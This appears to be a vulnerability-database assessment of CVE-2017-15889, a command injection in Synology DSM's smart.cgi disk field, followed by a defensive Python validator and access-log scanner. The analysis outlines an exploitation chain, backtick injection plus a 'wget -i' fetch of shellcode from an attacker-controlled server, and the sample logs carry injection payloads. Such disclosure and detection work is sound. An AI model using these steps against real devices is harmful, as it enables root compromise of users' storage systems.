Attacker Value: Very High (1 user assessed)
Exploitability: Low (1 user assessed)
User Interaction: None
Privileges Required: Low
Attack Vector: Network

CVE-2017-15889

Disclosure Date: December 04, 2017

Description

Command injection vulnerability in smart.cgi in Synology DiskStation Manager (DSM) before 5.2-5967-5 allows remote authenticated users to execute arbitrary commands via disk field.

Technical Analysis

AUTHENTICATED command execution in webman/modules/StorageManager/smart.cgi through either a GET or POST request.
Variables for the request look as such:

        # Request parameters sent to smart.cgi (GET query string or POST body)
        vars = {
          'action'    => 'apply',
          'operation' => 'quick',
          'disk'      => '/dev/sda'
        }

The disk field is vulnerable. However, that's just where the fun begins. The disk field is required to be 'semi' disk-correct, i.e. you can't just have nothing there, or "a"; however, "/dev/sd" did seem to work. Next, when the command is passed off, the entire disk field is limited to 30 characters. After shortening to "/dev/sd" and then adding ticks ('`') you are left with 22 characters. Pretty tight spacing.

To circumvent this restriction, the following was done:

  1. In < 22 characters, echo -n an IP:port to a file (/a).
  2. Use wget -i /a -O <file> to then pull back shell code from an attacker-controlled HTTP server.
  3. Execute the payload.

Most likely step 1 will need to be done in > 1 steps.

Exploitation grants root privileges.
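The assessment above makes the defender's point concrete: the only safe value for the disk field is a plain device node, and anything else (backticks, semicolons, a truncated "/dev/sd") is either an injection attempt or a malformed request. The following Python is an added example, not code from the assessment author or from Synology, showing a strict whitelist validator for that parameter and a small scan over constructed web-server access-log lines that flags smart.cgi requests whose disk value fails the whitelist. The regular expression, the metacharacter set and the log format are assumptions made for the example; DSM's own validation after the fix is not public on this page.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a hardened handler would only accept a bare SATA/SCSI device
# node, optionally with a partition number. "/dev/sd" alone is rejected too.
DISK_RE = re.compile(r"^/dev/sd[a-z]{1,2}[0-9]{0,2}$")

# Characters that have meaning to a shell; their presence in a device path
# is a strong signal of command injection rather than a typo.
SHELL_META = set("`$;|&<>(){}\n\"'\\ ")

# Constructed access-log lines (Common Log Format); not real traffic.
LOGS = [
    '10.0.0.5 - - [04/Dec/2017:10:00:01 +0000] "GET /webman/modules/StorageManager/smart.cgi?action=apply&operation=quick&disk=/dev/sda HTTP/1.1" 200 512',
    '10.0.0.9 - - [04/Dec/2017:10:00:07 +0000] "GET /webman/modules/StorageManager/smart.cgi?action=apply&operation=quick&disk=/dev/sd%60id%60 HTTP/1.1" 200 512',
    '10.0.0.9 - - [04/Dec/2017:10:00:09 +0000] "GET /webman/modules/StorageManager/smart.cgi?action=apply&operation=quick&disk=/dev/sd%3Bid HTTP/1.1" 200 512',
    '10.0.0.9 - - [04/Dec/2017:10:00:12 +0000] "GET /webman/modules/StorageManager/smart.cgi?action=apply&operation=quick&disk=/dev/sd HTTP/1.1" 200 512',
    '10.0.0.7 - - [04/Dec/2017:10:00:20 +0000] "POST /webman/modules/StorageManager/smart.cgi HTTP/1.1" 200 100',
]


def is_valid_disk(value: str) -> bool:
    """Return True only when value is a well-formed disk device path."""
    return DISK_RE.fullmatch(value) is not None


def smart_cgi_findings(log_lines):
    """Scan access-log lines for smart.cgi requests whose decoded 'disk'
    query parameter fails the whitelist.

    Returns a list of (line_number, decoded_disk_value, reason).
    Note: POST bodies are not in an access log, so POST-based requests
    need request-body logging or a WAF to be inspected the same way.
    """
    findings = []
    for lineno, line in enumerate(log_lines, 1):
        parts = line.split()
        if len(parts) < 7:
            continue
        target = parts[6]  # request path plus query string
        if "StorageManager/smart.cgi" not in target:
            continue
        # parse_qs percent-decodes, so %60 and %3B become ` and ;
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for disk in params.get("disk", []):
            if is_valid_disk(disk):
                continue
            meta = sorted({c for c in disk if c in SHELL_META})
            if meta:
                reason = "shell metacharacters: " + "".join(meta)
            else:
                reason = "not a whitelisted device path"
            findings.append((lineno, disk, reason))
    return findings


if __name__ == "__main__":
    for lineno, disk, reason in smart_cgi_findings(LOGS):
        print(f"line {lineno}: disk={disk!r} -> {reason}")
```

Running the block reports lines 2, 3 and 4: the first two carry backtick and semicolon injection attempts, the third is the truncated "/dev/sd" the assessment notes the vulnerable CGI accepted. Line 1 is a legitimate request and line 5 is a POST whose parameters never reach the access log, which is why body-level inspection is needed to cover both request methods the assessment mentions.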

General Information

Vendors

  • Synology

Products

  • DiskStation Manager (DSM)
